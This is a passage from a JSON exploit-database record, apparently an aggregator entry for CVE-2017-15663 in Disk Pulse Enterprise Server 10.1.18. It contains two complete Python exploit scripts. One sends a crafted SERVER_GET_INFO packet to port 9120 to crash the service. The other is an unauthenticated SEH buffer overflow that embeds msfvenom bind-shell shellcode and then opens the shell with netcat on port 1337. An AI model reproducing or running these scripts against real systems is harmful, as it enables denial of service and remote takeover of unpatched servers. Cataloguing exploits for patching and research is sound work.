#", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/29400"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:12", "description": "\nDisk Pulse Enterprise 10.1.18 - Denial of Service", "edition": 1, "published": "2018-01-08T00:00:00", "title": "Disk Pulse Enterprise 10.1.18 - Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-15663"], "modified": "2018-01-08T00:00:00", "id": "EXPLOITPACK:707D979D9B3271E0FBF5BF6A1315ACED", "href": "", "sourceData": "# Exploit Title: Disk Pulse Enterprise Server v10.1.18 - DOS,\n# Date: 2017-10-20\n# Exploit Author: Ahmad Mahfouz\n# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v10.1.18.exe\n# Version: v10.1.18\n# Category; Windows Remote DOS\n# CVE: CVE-2017-15663\n# Author Twitter: @eln1x\n# Description In Disk Pulse Enterprise Server v10.1.18, the Control Protocol suffers from a denial of service. 
The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9120.\n\n \n\n \n\nimport socket\ntarget = \"192.168.72.231\"\nport = 9120\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect((target,port))\n\npacket = \"\\x75\\x19\\xba\\xab\\x03\"\npacket +=\"\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x1a\"\npacket += \"\\x00\"\npacket += \"\\x3e\" #evil\npacket += \"\\x00\"\npacket += \"\\x20\"\npacket += \"\\x00\"\npacket += \"\\x00\"\npacket += \"\\x00\"\npacket += \"\\x00\\x00\\x00\\x00\"\npacket += \"SERVER_GET_INFO\"\npacket += \"\\x02\\x32\\x01\"\npacket += \"Data\"\npacket += \"\\x01\\x30\\x01\\x00\"\npacket += \"\\x04\\x02\\x74\"\npacket += \"\\x18\\x18\\x00\"\n\ns.send(packet)\n\ntry:\n\n data = s.recv(100)\n print data\n\nexcept:\n\n print \"K1LL3D\"", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T19:04:12", "description": "\nDisk Pulse Enterprise 10.1.18 - Remote Buffer Overflow", "edition": 1, "published": "2018-01-15T00:00:00", "title": "Disk Pulse Enterprise 10.1.18 - Remote Buffer Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-15663"], "modified": "2018-01-15T00:00:00", "id": "EXPLOITPACK:BDDF2149B6E579033DBF5F7F9437164D", "href": "", "sourceData": "# Exploit Title: Disk Pulse Enterprise Server v10.1.18 - Buffer Overflow\n# Exploit Author: Ahmad Mahfouz \n# Description: Disk Pule Enterprise Server Unauthenticated Remote Buffer Overflow SEH\n# Contact: http://twitter.com/eln1x\n# Date: 12/01/2018\n# CVE: CVE-2017-15663\n# Version: v10.1.18 \n# Tested on: Windows 7 x64\n# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v10.1.18.exe\n\n \n\nfrom struct import pack\nfrom os import system\nfrom sys import exit\nfrom time import sleep\nimport socket\n\n \n\nport = 9120\nhost = '192.168.72.231'\n\n\nstage1 = \"\\x83\\xc4\\x7f\" *17 # metasm > add esp,127\nstage1 += \"\\x83\\xc4\\x04\"\u00a0\u00a0\u00a0 # metasm > add esp,4\nstage1 +=\u00a0 
\"\\xff\\xe4\"\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # metasm > jmp esp\n# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=1337 -f py -b '\\x02'\n\nbuf =\u00a0 \"\\x90\" * 10 \nbuf += \"\\xb8\\x01\\x69\\xed\\x6f\\xdd\\xc3\\xd9\\x74\\x24\\xf4\\x5a\\x31\"\nbuf += \"\\xc9\\xb1\\x53\\x31\\x42\\x12\\x83\\xea\\xfc\\x03\\x43\\x67\\x0f\"\nbuf += \"\\x9a\\xbf\\x9f\\x4d\\x65\\x3f\\x60\\x32\\xef\\xda\\x51\\x72\\x8b\"\nbuf += \"\\xaf\\xc2\\x42\\xdf\\xfd\\xee\\x29\\x8d\\x15\\x64\\x5f\\x1a\\x1a\"\nbuf += \"\\xcd\\xea\\x7c\\x15\\xce\\x47\\xbc\\x34\\x4c\\x9a\\x91\\x96\\x6d\"\nbuf += \"\\x55\\xe4\\xd7\\xaa\\x88\\x05\\x85\\x63\\xc6\\xb8\\x39\\x07\\x92\"\nbuf += \"\\x00\\xb2\\x5b\\x32\\x01\\x27\\x2b\\x35\\x20\\xf6\\x27\\x6c\\xe2\"\nbuf += \"\\xf9\\xe4\\x04\\xab\\xe1\\xe9\\x21\\x65\\x9a\\xda\\xde\\x74\\x4a\"\nbuf += \"\\x13\\x1e\\xda\\xb3\\x9b\\xed\\x22\\xf4\\x1c\\x0e\\x51\\x0c\\x5f\"\nbuf += \"\\xb3\\x62\\xcb\\x1d\\x6f\\xe6\\xcf\\x86\\xe4\\x50\\x2b\\x36\\x28\"\nbuf += \"\\x06\\xb8\\x34\\x85\\x4c\\xe6\\x58\\x18\\x80\\x9d\\x65\\x91\\x27\"\nbuf += \"\\x71\\xec\\xe1\\x03\\x55\\xb4\\xb2\\x2a\\xcc\\x10\\x14\\x52\\x0e\"\nbuf += \"\\xfb\\xc9\\xf6\\x45\\x16\\x1d\\x8b\\x04\\x7f\\xd2\\xa6\\xb6\\x7f\"\nbuf += \"\\x7c\\xb0\\xc5\\x4d\\x23\\x6a\\x41\\xfe\\xac\\xb4\\x96\\x01\\x87\"\nbuf += \"\\x01\\x08\\xfc\\x28\\x72\\x01\\x3b\\x7c\\x22\\x39\\xea\\xfd\\xa9\"\nbuf += \"\\xb9\\x13\\x28\\x47\\xb1\\xb2\\x83\\x7a\\x3c\\x04\\x74\\x3b\\xee\"\nbuf += \"\\xed\\x9e\\xb4\\xd1\\x0e\\xa1\\x1e\\x7a\\xa6\\x5c\\xa1\\x81\\x0e\"\nbuf += \"\\xe8\\x47\\xe3\\x60\\xbc\\xd0\\x9b\\x42\\x9b\\xe8\\x3c\\xbc\\xc9\"\nbuf += \"\\x40\\xaa\\xf5\\x1b\\x56\\xd5\\x05\\x0e\\xf0\\x41\\x8e\\x5d\\xc4\"\nbuf += \"\\x70\\x91\\x4b\\x6c\\xe5\\x06\\x01\\xfd\\x44\\xb6\\x16\\xd4\\x3e\"\nbuf += \"\\x5b\\x84\\xb3\\xbe\\x12\\xb5\\x6b\\xe9\\x73\\x0b\\x62\\x7f\\x6e\"\nbuf += \"\\x32\\xdc\\x9d\\x73\\xa2\\x27\\x25\\xa8\\x17\\xa9\\xa4\\x3d\\x23\"\nbuf += \"\\x8d\\xb6\\xfb\\xac\\x89\\xe2\\x53\\xfb\\x47\\x5c\\x12\\x55\\x26\"\nbuf += 
\"\\x36\\xcc\\x0a\\xe0\\xde\\x89\\x60\\x33\\x98\\x95\\xac\\xc5\\x44\"\nbuf += \"\\x27\\x19\\x90\\x7b\\x88\\xcd\\x14\\x04\\xf4\\x6d\\xda\\xdf\\xbc\"\nbuf += \"\\x9e\\x91\\x7d\\x94\\x36\\x7c\\x14\\xa4\\x5a\\x7f\\xc3\\xeb\\x62\"\nbuf += \"\\xfc\\xe1\\x93\\x90\\x1c\\x80\\x96\\xdd\\x9a\\x79\\xeb\\x4e\\x4f\"\nbuf += \"\\x7d\\x58\\x6e\\x5a\"\n\nshellcode = buf\npayload = 'A' * 124\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 #offset\npayload +=\u00a0 '\\xeb\\x09\\x90\\x90'\u00a0 #jmp over seh retrun value\npayload +=\u00a0 '\\xcd\\x89\\x06\\x10' #0x100689cd : pop ebp # pop ebx # ret 0x04 |\u00a0 {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\\Program Files (x86)\\Disk Pulse Enterprise\\bin\\libspp.dll)\npayload += stage1 \npayload +=\u00a0 '\\x90' * (1000 - len(payload) - len(shellcode))\npayload += shellcode \n\n \n\nheader = '\\x75\\x19\\xba\\xab'\nheader += '\\x03\\x00\\x00\\x00'\nheader += '\\x00\\x40\\x00\\x00'\nheader += pack('<I', len(payload))\nheader += pack('<I', len(payload))\nheader += pack('<I', ord(payload[-1]))\npacket = header\npacket += payload \n\n \n\n \n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ntry:\n\n\u00a0\u00a0\u00a0 print \"[*] Testing connection to tatget %s:%s\" %(host,port)\n\u00a0\u00a0\u00a0 s.connect((host, port))\n\nexcept:\n\n\u00a0\u00a0\u00a0 print \"[-] Unable to communicate to target %s:%s\" %(host,port)\n\n\u00a0\u00a0\u00a0 exit()\n\n \n\ns.send(packet)\n\nprint \"[*] Payload Sent..\"\nprint \"[*] Connecting to bind shell %s:1337 ..\" %host\nsleep(3)\nsystem(\"nc %s 1337\"%host)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}